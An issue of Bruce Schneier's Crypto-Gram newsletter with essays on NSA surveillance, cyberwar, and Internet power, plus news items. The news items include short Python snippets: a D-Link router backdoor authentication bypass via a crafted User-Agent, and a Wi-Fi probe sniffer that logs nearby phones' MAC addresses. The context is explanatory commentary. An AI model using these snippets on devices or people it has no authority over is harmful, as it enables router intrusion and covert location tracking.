Pre-Snowden, there was no downside to cooperating with the NSA. If the NSA asked you for copies of all your Internet traffic, or to put backdoors into your security software, you could assume that your cooperation would forever remain secret. To be fair, not every corporation cooperated willingly. Some fought in court. But it seems that a lot of them, telcos and backbone providers especially, were happy to give the NSA unfettered access to everything. Post-Snowden, this is changing. Now that many companies’ cooperation has become public, they’re facing a PR backlash from customers and users who are upset that their data is flowing to the NSA. And this is costing those companies business.

How much is unclear. In July, right after the PRISM revelations, the Cloud Security Alliance reported that US cloud companies could lose $35 billion over the next three years, mostly due to losses of foreign sales. Surely that number has increased as outrage over NSA spying continues to build in Europe and elsewhere. There is no similar report for software sales, although I have attended private meetings where several large US software companies complained about the loss of foreign sales. On the hardware side, IBM is losing business in China. The US telecom companies are also suffering: AT&T is losing business worldwide.

This is the new reality. The rules of secrecy are different, and companies have to assume that their responses to NSA data demands will become public. This means there is now a significant cost to cooperating, and a corresponding benefit to fighting.

Over the past few months, more companies have woken up to the fact that the NSA is basically treating them as adversaries, and are responding as such. In mid-October, it became public that the NSA was collecting e-mail address books and buddy lists from Internet users logging into different service providers. Yahoo, which didn’t encrypt those user connections by default, allowed the NSA to collect much more of its data than Google, which did. That same day, Yahoo announced that it would implement SSL encryption by default for all of its users. Two weeks later, when it became public that the NSA was collecting data on Google users by eavesdropping on the company’s trunk connections between its data centers, Google announced that it would encrypt those connections.

We recently learned that Yahoo fought a government order to turn over data. Lavabit fought its order as well. Apple is now tweaking the government. And we think better of those companies because of it.

Now Lavabit, which closed down its e-mail service rather than comply with the NSA’s request for the master keys that would compromise all of its customers, has teamed with Silent Circle to develop a secure e-mail standard that is resistant to these kinds of tactics.

The Snowden documents made it clear how much the NSA relies on corporations to eavesdrop on the Internet. The NSA didn’t build a massive Internet eavesdropping system from scratch. It noticed that the corporate world was already eavesdropping on every Internet user—surveillance is the business model of the Internet, after all—and simply got copies for itself.

Now, that secret ecosystem is breaking down. Supreme Court Justice Louis Brandeis wrote about transparency, saying “Sunlight is said to be the best of disinfectants.” In this case, it seems to be working.

These developments will only help security. Remember that while Edward Snowden has given us a window into the NSA’s activities, these sorts of tactics are probably also used by other intelligence services around the world. And today’s secret NSA programs become tomorrow’s PhD theses, and the next day’s criminal hacker tools. It’s impossible to build an Internet where the good guys can eavesdrop, and the bad guys cannot. We have a choice between an Internet that is vulnerable to all attackers, or an Internet that is safe from all attackers. And a safe and secure Internet is in everyone’s best interests, including the US’s.

This essay previously appeared on TheAtlantic.com.
http://www.theatlantic.com/technology/archive/2013/…

The public/private surveillance partnership:
https://www.schneier.com/blog/archives/2013/08/…

PRISM:
http://www.washingtonpost.com/investigations/…

Increased outrage outside the US:
http://www.usatoday.com/story/news/world/2013/10/28/…

Losses due to NSA spying:
http://www.washingtonpost.com/s/the-switch/wp/…
http://www.nakedcapitalism.com/2013/10/…
http://online.wsj.com/news/articles/…

New rules of secrecy:
https://www.schneier.com/essay-449.html

The NSA and tech companies as adversaries:
http://www.theguardian.com/commentisfree/2013/nov/…
http://www.nytimes.com/2013/11/01/technology/…
http://www.wired.com/opinion/2013/08/…
http://www.theguardian.com/world/2013/sep/09/…
http://news.cnet.com/8301-1009_3-57610342-83/…
http://news.yahoo.com/…
http://rt.com/news/…
https://www.techdirt.com/articles/20130924/…
http://boingboing.net/2013/11/05/…

Yahoo announces SSL by default:
http://www.washingtonpost.com/s/the-switch/wp/…

Lavabit:
https://www.schneier.com/blog/archives/2013/08/…

Silent Circle’s new e-mail system:
http://www.computerworld.com.au/article/530582/…

Brandeis quote:
http://www.law.louisville.edu/library/collections/…


Book Review: “Cyber War Will Not Take Place”

Cyber war is possibly the most dangerous buzzword of the Internet era. The fear-inducing rhetoric surrounding it is being used to justify major changes in the way the Internet is organized, governed, and constructed. And in “Cyber War Will Not Take Place,” Thomas Rid convincingly argues that cyber war is not a compelling threat. Rid is one of the leading cyber war skeptics in Europe, and although he doesn’t argue that war won’t extend into cyberspace, he says that cyberspace’s role in war is more limited than doomsayers want us to believe. His argument against cyber war is lucid and methodical. He divides “offensive and violent political acts” in cyberspace into three categories: sabotage, espionage, and subversion. These categories are larger than cyberspace, of course, but Rid spends considerable time analyzing their strengths and limitations within cyberspace. The details are complicated, but his conclusion is that many of these types of attacks cannot be defined as acts of war, and any future war won’t involve many of these types of attacks.

None of this is meant to imply that cyberspace is safe. Threats of all sorts fill cyberspace, but not threats of war. As such, the policies to defend against them are different. While hackers and criminal threats get all the headlines, more worrisome are the threats from governments seeking to consolidate their power. I have long argued that controlling the Internet has become critical for totalitarian states, and that their four broad tools of surveillance, censorship, propaganda, and use control all have legitimate commercial applications and are also employed by democracies.

A lot of the problem here is of definition. There isn’t broad agreement as to what constitutes cyber war, and this confusion plays into the hands of those hyping its threat. If everything from Chinese espionage to Russian criminal extortion to activist disruption falls under the cyber war umbrella, then it only makes sense to put more of the Internet under government—and thus military—control. Rid’s book is a compelling counter-argument to this approach.

Rid’s final chapter is an essay unto itself, and lays out his vision as to how we should deal with threats in cyberspace. For policymakers who won’t sit through an entire book, this is the chapter I would urge them to read. Arms races are dangerous and destabilizing, and we’re in the early years of a cyberwar arms race that’s being fueled by fear and ignorance. This book is a cogent counterpoint to the doomsayers and the profiteers, and should be required reading for anyone concerned about security in cyberspace.

This book review previously appeared in Europe’s World.
http://europesworld.org/2013/10/01/…

Thomas Rid, “Cyber War Will Not Take Place,” Oxford University Press, 2013.


Understanding the Threats in Cyberspace

The primary difficulty of cyber security isn’t technology—it’s policy. The Internet mirrors real-world society, which makes security policy online as complicated as it is in the real world. Protecting critical infrastructure against cyber-attack is just one of cyberspace’s many security challenges, so it’s important to understand them all before any one of them can be solved.

The list of bad actors in cyberspace is long, and spans a wide range of motives and capabilities. At the extreme end there’s cyberwar: destructive actions by governments during a war. When government policymakers like David Omand think of cyber-attacks, that’s what comes to mind. Cyberwar is conducted by capable and well-funded groups and involves military operations against both military and civilian targets. Along much the same lines are non-nation state actors who conduct terrorist operations. Although less capable and well-funded, they are often talked about in the same breath as true cyberwar.

Much more common are the domestic and international criminals who run the gamut from lone individuals to organized crime. They can be very capable and well-funded and will continue to inflict significant economic damage.

Threats from peacetime governments have been seen increasingly in the news. The US worries about Chinese espionage against Western targets, and we’re also seeing US surveillance of pretty much everyone in the world, including Americans inside the US. The National Security Agency (NSA) is probably the most capable and well-funded espionage organization in the world, and we’re still learning about the full extent of its sometimes illegal operations.

Hacktivists are a different threat. Their actions range from Internet-age acts of civil disobedience to the inflicting of actual damage. This is hard to generalize about because the individuals and groups in this category vary so much in skill, funding and motivation. Hackers falling under the “Anonymous” aegis—it really isn’t correct to call them a group—come under this category, as does WikiLeaks. Most of these attackers are outside the organization, although whistleblowing—the civil disobedience of the information age—generally involves insiders like Edward Snowden.

This list of potential network attackers isn’t exhaustive. Depending on who you are and what your organization does, you might also be concerned with espionage cyber-attacks by the media, rival corporations, or even the corporations we entrust with our data.

The issue here, and why it affects policy, is that protecting against these various threats can lead to contradictory requirements. In the US, the NSA’s post-9/11 mission to protect the country from terrorists has transformed it into a domestic surveillance organization. The NSA’s need to protect its own information systems from outside attack opened it up to attacks from within. Do the corporate security products we buy to protect ourselves against cybercrime contain backdoors that allow for government spying? European countries may condemn the US for spying on its own citizens, but do they do the same thing?

All these questions are especially difficult because military and security organizations along with corporations tend to hype particular threats. For example, cyberwar and cyberterrorism are greatly overblown as threats—because they result in massive government programs with huge budgets and power—while cybercrime is largely downplayed.

We need greater transparency, oversight and accountability on both the government and corporate sides before we can move forward. With the secrecy that surrounds cyber-attack and cyberdefense, it’s hard to be optimistic.

This essay previously appeared in “Europe’s World.”
http://europesworld.org/commentaries/…


News

Ed Felten makes a strong argument that a court order is exactly the same thing as an insider attack:
https://freedom-to-tinker.com//felten/…
This is why designing Lavabit to be resistant to court order would have been the right thing to do, and why we should all demand systems that are designed in this way.
http://boingboing.net/2013/10/15/…

There seems to be a bunch of research into uniquely identifying cell phones through the unique analog characteristics of their embedded sensors. These sorts of things could replace cookies as surveillance tools; a toy sketch of the idea follows the links below.
http://www.hotmobile.org/2014/papers/posters/…
http://.sfgate.com/techchron/2013/10/10/…
http://yro.slashdot.org/story/13/10/11/1231240/…
http://www.metafilter.com/132752/…
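
A toy sketch of the idea (my own illustration; the actual papers use richer features and classifiers): tiny manufacturing biases in each phone's accelerometer persist across sessions and can serve as a fingerprint.

    # Toy sensor-fingerprint sketch (illustration only; real research uses
    # richer features and machine-learning classifiers). Per-axis bias and
    # noise of an accelerometer at rest differ slightly per device.
    import numpy as np

    def fingerprint(samples: np.ndarray) -> np.ndarray:
        # samples: (n, 3) array of raw x/y/z accelerometer readings taken
        # while the phone is at rest.
        return np.concatenate([samples.mean(axis=0), samples.std(axis=0)])

    def same_device(fp_a: np.ndarray, fp_b: np.ndarray,
                    tol: float = 0.01) -> bool:
        return bool(np.linalg.norm(fp_a - fp_b) < tol)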

Several versions of D-Link router firmware contain a backdoor. Just set the browser’s user agent string to “xmlset_roodkcableoj28840ybtide,” and you’re in. (Hint: remove the number and read it backwards.) It was probably put there for debugging purposes, but it has all sorts of applications for surveillance. A minimal demonstration is sketched after the links below.
http://www.devttys0.com/2013/10/…
http://www.infoworld.com/d/security/…
There are open-source programs available to replace the firmware:
http://www.infoworld.com/d/networking/…
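
The demonstration really is this simple, assuming you own one of the affected routers (the address below is a placeholder):

    # Sketch: requests sent to the affected D-Link firmware with this
    # User-Agent bypass authentication. The IP address is a placeholder;
    # try this only against a device you own.
    import requests

    resp = requests.get(
        "http://192.168.0.1/",  # placeholder router address
        headers={"User-Agent": "xmlset_roodkcableoj28840ybtide"},
        timeout=5,
    )
    # A normal admin response without any login suggests the backdoor
    # is present on this firmware version.
    print(resp.status_code)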

The new iPhone has a motion sensor chip, and that opens up new opportunities for surveillance.
http://www.wired.com/opinion/2013/10/…

Slashdot asks whether I can be trusted:
http://ask.slashdot.org/story/13/10/22/1416201/…

DARPA is looking for a fully automated network defense system, and has a contest:
http://www.darpa.mil/NewsEvents/Releases/2013/10/…
http://www.forbes.com/sites/andygreenberg/2013/10/…
http://gizmodo.com/…
http://www.infosecurity-magazine.com/view/35211/…
http://news.slashdot.org/story/13/10/24/0242252/…
http://www.reddit.com/r/netsec/comments/1ozoiy/…

Cognitive biases about violence as a negotiating tactic: interesting paper.
http://www.academia.edu/4770419/…

This article talks about applications of close-in surveillance using your phone’s Wi-Fi in retail, but the possibilities are endless.
http://www.washingtonpost.com/s/the-switch/wp/…
Basically, the system is using the MAC address to identify individual devices; a sketch of the collection technique follows below. Another article on the system is here.
http://www.nytimes.com/2013/07/15/business/…
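
Here is a minimal sketch of the underlying collection technique, using the scapy library (the monitor-mode interface name is a placeholder; run this only on your own network):

    # Sketch: passively log Wi-Fi probe requests; the source MAC address
    # identifies each nearby phone. Requires scapy, root privileges, and
    # a wireless card in monitor mode. Interface name is a placeholder.
    from scapy.all import sniff
    from scapy.layers.dot11 import Dot11ProbeReq

    def log_probe(pkt):
        if pkt.haslayer(Dot11ProbeReq):
            print("device seen:", pkt.addr2)  # source MAC of the phone

    sniff(iface="wlan0mon", prn=log_probe, store=False)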

Good story of badBIOS, a really nasty piece of malware. The weirdest part is how it uses ultrasonic sound to jump air gaps.
http://arstechnica.com/security/2013/10/…
I’m not sure what to make of this. When I first read it, I thought it was a hoax. But enough others are taking it seriously that I think it’s a real story. I don’t know whether the facts are real, and I haven’t seen anything about what this malware actually does.
http://boingboing.net/2013/10/31/…
http://www.reddit.com/r/netsec/comments/1pm66y/…
https://news.ycombinator.com/item?id=6654663
http://.erratasec.com/2013/10/…
A debunking:
http://www.rootwyrm.com/2013/11/…

This story of the bomb squad at the Boston Marathon is interesting reading, but I’m left wanting more. What are the lessons here? How can we do this better next time? Clearly we won’t be able to anticipate bombings; even Israel can’t do that. We have to get better at responding.
http://www.wired.com/threatlevel/2013/10/…

Here’s a demonstration of the US government’s capabilities to monitor the public Internet. Former CIA and NSA Director Michael Hayden was on the Acela train between New York and Washington DC, taking press interviews on the phone. Someone nearby overheard the conversation, and started tweeting about it. Within 15 or so minutes, someone somewhere noticed the tweets, and informed someone who knew Hayden. That person called Hayden on his cell phone and, presumably, told him to shut up. Nothing covert here; the tweets were public.
http://www.theguardian.com/world/2013/oct/24/…
I don’t think this was a result of the NSA monitoring the Internet. I think this was some public relations office—probably the one that is helping General Alexander respond to all the Snowden stories—searching the public Twitter feed for, among other things, Hayden’s name. Even so: wow.

This elliptic-curve crypto primer is well-written and very good.
http://arstechnica.com/security/2013/10/…

The wings of the *Goniurellia tridens* fruit fly have images of an ant on them, to deceive predators: “When threatened, the fly flashes its wings to give the appearance of ants walking back and forth. The predator gets confused and the fly zips off.”
http://www.thenational.ae/news/uae-news/science/…

Interesting article on risk-based authentication. I like the idea of giving each individual login attempt a risk score, based on the characteristics of the attempt; a toy sketch follows the link below.
http://deloitte.wsj.com/cio/2013/10/30/…
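
A toy sketch of the idea (my own illustration, not any vendor's actual scoring logic):

    # Toy risk-scoring sketch: each suspicious attribute of a login
    # attempt adds to the score, and the score determines how much
    # authentication to demand. (My illustration, not a vendor's logic.)
    def login_risk(attempt: dict) -> int:
        score = 0
        if attempt.get("new_device"):
            score += 40
        if attempt.get("unusual_country"):
            score += 30
        if attempt.get("odd_hour"):
            score += 10
        if attempt.get("recent_failures", 0) > 3:
            score += 20
        return score

    def required_auth(score: int) -> str:
        if score >= 60:
            return "block and alert"
        if score >= 30:
            return "require second factor"
        return "password only"

    print(required_auth(login_risk({"new_device": True,
                                    "unusual_country": True})))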

This bizarre essay argues that online gambling is a strategic national threat because terrorists could use it to launder money.
http://www.tampabay.com/opinion/columns/…
I’m impressed with the massive amount of fear resonating in it.

Adobe lost 150 million customer passwords. Even worse, it had a pretty dumb cryptographic hash system protecting those passwords; a sketch of the failure mode follows the links below.
http://www.theguardian.com/technology/2013/nov/07/…
http://nakedsecurity.sophos.com/2013/11/04/…
http://xkcd.com/1286/
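
According to the Sophos analysis linked above, the passwords were reportedly encrypted with a block cipher in ECB mode, unsalted, rather than hashed. A short Python sketch of why that fails (AES here as a stand-in for the cipher reportedly used):

    # Sketch of the failure mode reported in the Adobe breach: passwords
    # encrypted (not hashed) with a block cipher in ECB mode and no salt,
    # so identical passwords yield identical stored values. AES stands in
    # for the reported cipher. Handles passwords up to 16 bytes only.
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    KEY = b"\x00" * 16  # stand-in for the company's single secret key

    def ecb_store(password: bytes) -> bytes:
        enc = Cipher(algorithms.AES(KEY), modes.ECB()).encryptor()
        padded = password.ljust(16, b"\x00")  # naive zero padding
        return enc.update(padded) + enc.finalize()

    # Two users with the same password get the same ciphertext, so an
    # attacker can group accounts by password without any decryption,
    # then use password hints to crack the biggest groups first.
    assert ecb_store(b"123456") == ecb_store(b"123456")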

Microsoft has announced plans to retire SHA-1 by 2016. I think this is a good move.
https://www.schneier.com/blog/archives/2013/11/…


SecureDrop

SecureDrop is an open-source whistleblower support system, originally written by Aaron Swartz and now run by the Freedom of the Press Foundation. The first instance of this system was named StrongBox and is being run by “The New Yorker.” To further add to the naming confusion, Aaron Swartz called the system DeadDrop when he wrote the code.

I participated in a detailed security audit of the StrongBox implementation, along with some great researchers from the University of Washington and Jacob Appelbaum. The problems we found were largely procedural, and the Freedom of the Press Foundation is working to fix them.

Freedom of the Press Foundation is not running any instances of SecureDrop. It has about a half dozen major news organizations lined up, and will be helping them install their own starting the first week of November. So hopefully any would-be whistleblowers will soon have their choice of news organizations to securely communicate with.

Strong technical whistleblower protection is essential, especially given President Obama’s war on whistleblowers. I hope this system is broadly implemented and extensively used.

SecureDrop:
https://pressfreedomfoundation.org/securedrop
https://pressfreedomfoundation.org//2013/10/…

StrongBox:
http://www.newyorker.com/strongbox/

DeadDrop:
http://deaddrop.github.io/

Our security audit:
http://homes.cs.washington.edu/~aczeskis/research/…

Obama’s war on whistleblowers:
http://www.motherjones.com/politics/2012/06/…
http://www.techdirt.com/articles/20130722/…
https://www.cpj.org/reports/2013/10/…

The US government sets up secure indoor tents for the president and other officials to deal with classified material while traveling abroad.
http://www.theage.com.au/world/…


Dry Ice Bombs at LAX

The news story about the guy who left dry ice bombs in restricted areas of LAX is really weird.

I can’t get worked up over it, though. Dry ice bombs are a harmless prank. I set off a bunch of them when I was in college, although I used liquid nitrogen, because I was impatient—and they’re harmless. I know of someone who set a few off over the summer, just for fun. They do make a very satisfying boom.

Having them set off in a secure airport area doesn’t illustrate any new vulnerabilities. We already know that trusted people can subvert security systems. So what?

I’ve done a bunch of press interviews on this. One radio announcer really didn’t like my nonchalance. He really wanted me to complain about the lack of cameras at LAX, and was unhappy when I pointed out that we didn’t need cameras to catch this guy.

I like my kicker quote in this article:

Various people, including former Los Angeles Police Chief William Bratton, have called LAX the No. 1 terrorist target on the West Coast. But while an Algerian man discovered with a bomb at the Canadian border in 1999 was sentenced to 37 years in prison in connection with a plot to cause damage at LAX, Schneier said that assessment by Bratton is probably not true.

“Where can you possibly get that data?” he said. “I don’t think terrorists respond to opinion polls about how juicy targets are.”

http://www.latimes.com/local/lanow/…
http://www.latimes.com/local/lanow/…
http://www.latimes.com/local/…
http://www.dailynews.com/general-news/20131019/…


Schneier News

In the spring semester, I’m running a reading group—which seems to be a formal variant of a study group—at Harvard Law School on “Security, Power, and the Internet.” I would like a good mix of people, so non-law students and non-Harvard students are both welcome to sign up.
http://www.law.harvard.edu/academics/curriculum/…

Various security articles about me (or with good quotes by me):
http://fedscoop.com/…
http://www.techdirt.com/articles/20131105/11325125139/
http://www.computerworld.com/s/article/9243865/…
http://www.economist.com/s/babbage/2013/11/…

My talk at the IETF Vancouver meeting on NSA and surveillance:
http://www.youtube.com/watch?v=oV71hhEpQ20

Press articles about me and the IETF meeting:
http://www.darkreading.com/vulnerability/…
http://www.technologyreview.com/view/521306/…
http://www.ip-watch.org/2013/11/07/…
http://www.economist.com/news/…
http://www.net-security.org/secworld.php?id=15916

Other video interviews:
http://cis-india.org/internet-governance/…
http://connecttheworld.blogs.cnn.com/tag/…
http://www.youtube.com/watch?v=Ar67N94NYr0
http://www.youtube.com/watch?…
http://www.channel4.com/news/…


The Battle for Power on the Internet

We’re in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side. It gave them a place to coordinate and communicate efficiently, and made them seem unbeatable. But now, the more traditional institutional powers are winning, and winning big. How these two sides fare in the long term, and the fate of the rest of us who don’t fall into either group, is an open question—and one vitally important to the future of the Internet.

In the Internet’s early days, there was a lot of talk about its “natural laws”—how it would upend traditional power blocks, empower the masses, and spread freedom throughout the world. The international nature of the Internet circumvented national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes seemed inevitable. Digital cash would undermine national sovereignty. Citizen journalism would topple traditional media, corporate PR, and political parties. Easy digital copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order.

This was a utopian vision, but some of it did come to pass. Internet marketing has transformed commerce. The entertainment industries have been transformed by things like MySpace and YouTube, and are now more open to outsiders. Mass media has changed dramatically, and some of the most influential people in the media have come from the blogging world. There are new ways to organize politically and run elections. Crowdfunding has made it possible to finance tens of thousands of projects, and crowdsourcing has made more types of projects possible. Facebook and Twitter really did help topple governments.

But that is just one side of the Internet’s disruptive character. The Internet has emboldened traditional power as well.

On the corporate side, power is consolidating, a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendars, address books, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, we are increasingly accessing our data using devices that we have much less control over: iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Unlike traditional operating systems, those devices are controlled much more tightly by the vendors, who limit what software can run, what they can do, how they’re updated, and so on. Even Windows 8 and Apple’s Mountain Lion operating system are heading in the direction of more vendor control.

I have previously characterized this model of computing as “feudal.” Users pledge their allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It’s a metaphor that’s rich in history and in fiction, and a model that’s increasingly permeating computing today.

Medieval feudalism was a hierarchical political system, with obligations in both directions. Lords offered protection, and vassals offered service. The lord-peasant relationship was similar, with a much greater power differential. It was a response to a dangerous world.

Feudal security consolidates power in the hands of the few. Internet companies, like lords before them, act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes. They’re deliberately—and incidentally—changing social norms. Medieval feudalism gave the lords vast powers over the landless peasants; we’re seeing the same thing on the Internet.

It’s not all bad, of course. We, especially those of us who are not technical, like the convenience, redundancy, portability, automation, and shareability of vendor-managed devices. We like cloud backup. We like automatic updates. We like not having to deal with security ourselves. We like that Facebook just works—from any device, anywhere.

Government power is also increasing on the Internet. There is more government surveillance than ever before. There is more government censorship than ever before. There is more government propaganda, and an increasing number of governments are controlling what their users can and cannot do on the Internet. Totalitarian governments are embracing a growing “cyber sovereignty” movement to further consolidate their power. And the cyberwar arms race is on, pumping an enormous amount of money into cyber-weapons and consolidated cyber-defenses, further increasing government power.

In many cases, the interests of corporate and government powers are aligning. Both corporations and governments benefit from ubiquitous surveillance, and the NSA is using Google, Facebook, Verizon, and others to get access to data it couldn’t otherwise. The entertainment industry is looking to governments to enforce its antiquated business models. Commercial security equipment from companies like BlueCoat and Sophos is being used by oppressive governments to surveil and censor their citizens. The same facial recognition technology that Disney uses in its theme parks can also identify protesters in China and Occupy Wall Street activists in New York. Think of it as a public/private surveillance partnership.

What happened? How, in those early Internet years, did we get the future so wrong?

The truth is that technology magnifies power in general, but rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: they can make use of new technologies very quickly. And when those groups discovered the Internet, suddenly they had power. But later, when the already-powerful big institutions finally figured out how to harness the Internet, they had more power to magnify. That’s the difference: the distributed were more nimble and were faster to make use of their new power, while the institutional were slower but were able to use their power more effectively.

So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents to arrest.

All isn’t lost for distributed power, though. For institutional power, the Internet is a change in degree, but for distributed power, it’s a qualitative one. The Internet gives decentralized groups—for the first time—the ability to coordinate. This can have incredible ramifications, as we saw in the SOPA/PIPA debate, Gezi, Brazil, and the rising use of crowdfunding. It can invert power dynamics, even in the presence of surveillance, censorship, and use control. But aside from political coordination, the Internet allows for social coordination as well—to unite, for example, ethnic diasporas, gender minorities, sufferers of rare diseases, and people with obscure interests.

This isn’t static: Technological advances continue to provide advantage to the nimble. I discussed this trend in my book “Liars and Outliers.” If you think of security as an arms race between attackers and defenders, any technological advance gives one side or the other a temporary advantage. But most of the time, a new technology benefits the nimble first. They are not hindered by bureaucracy—and sometimes not by laws or ethics, either. They can evolve faster.

We saw it with the Internet. As soon as the Internet started being used for commerce, a new breed of cybercriminal emerged, immediately able to take advantage of the new technology. It took police a decade to catch up. And we saw it on social media, as political dissidents made use of its organizational powers before totalitarian regimes did.

This delay is what I call a “security gap.” It’s greater when there’s more technology, and in times of rapid technological change. Basically, if there are more innovations to exploit, there will be more damage resulting from society’s inability to keep up with exploiters of all of them. And since our world is one in which there’s more technology than ever before, and a faster rate of technological change than ever before, we should expect to see a greater security gap than ever before. In other words, there will be an increasing time period during which nimble distributed powers can make use of new technologies before slow institutional powers can make better use of those technologies.

This is the battle: quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power—whether marginal, dissident, or criminal—as Robin Hood; and ponderous institutional powers—both government and corporate—as the feudal lords.

So who wins? Which type of power dominates in the coming decades?

Right now, it looks like traditional power. Ubiquitous surveillance means that it’s easier for the government to identify dissidents than it is for the dissidents to remain anonymous. Data monitoring means that it’s easier for the Great Firewall of China to block data than it is for people to circumvent it. The way we all use the Internet makes it much easier for the NSA to spy on everyone than it is for anyone to maintain privacy. And even though it is easy to circumvent digital copy protection, most users still can’t do it.

The problem is that leveraging Internet power requires technical expertise. Those with sufficient ability will be able to stay ahead of institutional powers. Whether it’s setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that can evade institutional powers. This is why cybercrime is still pervasive, even as police savvy increases; why technically capable whistleblowers can do so much damage; and why organizations like Anonymous are still a viable social and political force. Assuming technology continues to advance—and there’s no reason to believe it won’t—there will always be a security gap in which technically advanced Robin Hoods can operate.

Most people, though, are stuck in the middle. These are people who don’t have the technical ability to evade large governments and corporations, avoid the criminal and hacker groups who prey on us, or join any resistance or dissident movements. These are the people who accept default configuration options, arbitrary terms of service, NSA-installed backdoors, and the occasional complete loss of their data. These are the people who get increasingly isolated as government and corporate power align. In the feudal world, these are the hapless peasants. And it’s even worse when the feudal lords—or any powers—fight each other. As anyone watching “Game of Thrones” knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it’s the US vs. “the terrorists” or China vs. its dissidents.

The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. We’ve already seen this: Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. Digital pirates can make more copies of more things much more quickly than their analog forebears. And we’ll see it in the future: 3D printers mean that the computer restriction debate will soon involve guns, not movies. Big data will mean that more companies will be able to identify and track you more easily. It’s the same problem as the “weapons of mass destruction” fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives. And by the same token, terrorists with large-scale cyberweapons can potentially do more damage than terrorists with those same bombs.

It’s a numbers game. Very broadly, because of the way humans behave as a species and as a society, every society is going to have a certain amount of crime. And there’s a particular crime rate society is willing to tolerate. With historically inefficient criminals, we were willing to live with some percentage of criminals in our society. As technology makes each individual criminal more powerful, the percentage we can tolerate decreases. Again, remember the “weapons of mass destruction” debate: As the amount of damage each individual terrorist can do increases, we need to do increasingly more to prevent even a single terrorist from succeeding.

The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional powers will get. This means increasingly repressive security measures, even if the security gap means that such measures become increasingly ineffective. And it will squeeze the peasants in the middle even more.

Without the protection of his own feudal lord, the peasant was subject to abuse both by criminals and other feudal lords. But both corporations and the government—and often the two in cahoots—are using their power to their own advantage, trampling on our rights in the process. And without the technical savvy to become Robin Hoods ourselves, we have no recourse but to submit to whatever the ruling institutional power wants.

So what happens as technology increases? Is a police state the only effective way to control distributed power and keep our society safe? Or do the fringe elements inevitably destroy society as technology increases their power? Probably neither doomsday scenario will come to pass, but figuring out a stable middle ground is hard. These questions are complicated, and dependent on future technological advances that we cannot predict. But they are primarily political questions, and any solutions will be political.

In the short term, we need more transparency and oversight. The more we know of what institutional powers are doing, the more we can trust that they are not abusing their authority. We have long known this to be true in government, but we have increasingly ignored it in our fear of terrorism and other modern threats. This is also true for corporate power. Unfortunately, market dynamics will not necessarily force corporations to be transparent; we need laws to do that. The same is true for decentralized power; transparency is how we’ll differentiate political dissidents from criminal organizations.

Oversight is also critically important, and is another long-understood mechanism for checking power. This can be a combination of things: courts that act as third-party advocates for the rule of law rather than rubber-stamp organizations, legislatures that understand the technologies and how they affect power balances, and vibrant public-sector press and watchdog groups that analyze and debate the actions of those wielding power.

Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. For if we’re going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails.

In the longer term, we need to work to reduce power differences. The key to all of this is access to data. On the Internet, data is power. To the extent the powerless have access to it, they gain in power. To the extent that the already powerful have access to it, they further consolidate their power. As we look to reducing power imbalances, we have to look at data: data privacy for individuals, mandatory disclosure laws for corporations, and open government laws.

Medieval feudalism evolved into a more balanced relationship in which lords had responsibilities as well as rights. Today’s Internet feudalism is both ad-hoc and one-sided. Those in power have a lot of rights, but increasingly few responsibilities or limits. We need to rebalance this relationship. In medieval Europe, the rise of the centralized state and the rule of law provided the stability that feudalism lacked. The Magna Carta first forced responsibilities on governments and put humans on the long road toward government by the people and for the people. In addition to reining in government power, we need similar restrictions on corporate power: a new Magna Carta focused on the institutions that abuse power in the 21st century.

Today’s Internet is a fortuitous accident: a combination of an initial lack of commercial interests, government benign neglect, military requirements for survivability and resilience, and computer engineers building open systems that worked simply and easily.

We’re at the beginning of some critical debates about the future of the Internet: the proper role of law enforcement, the character of ubiquitous surveillance, the collection and retention of our entire life’s history, how automatic algorithms should judge us, government control over the Internet, cyberwar rules of engagement, national sovereignty on the Internet, limitations on the power of corporations over our data, the ramifications of information consumerism, and so on.

Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it—how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it—is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in its rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data.

This won’t be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they’re not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem.

I can’t tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad.

This essay previously appeared in “The Atlantic.”
http://www.theatlantic.com/technology/archive/2013/…

Feudal security:
https://www.schneier.com/essay-406.html

Increasing government power:
https://www.schneier.com/essay-420.html

Cyberwar arms race:
https://www.schneier.com/essay-421.html

Public/private surveillance partnership:
https://www.schneier.com/essay-436.html

Ubiquitous surveillance:
https://www.schneier.com/essay-460.html

How technological advances make this worse:
https://www.schneier.com/essay-460.html

Transparency and oversight:
https://www.schneier.com/essay-425.html

This essay has been translated into Danish.
http://www.dseneste.dk/index.php/politik/…


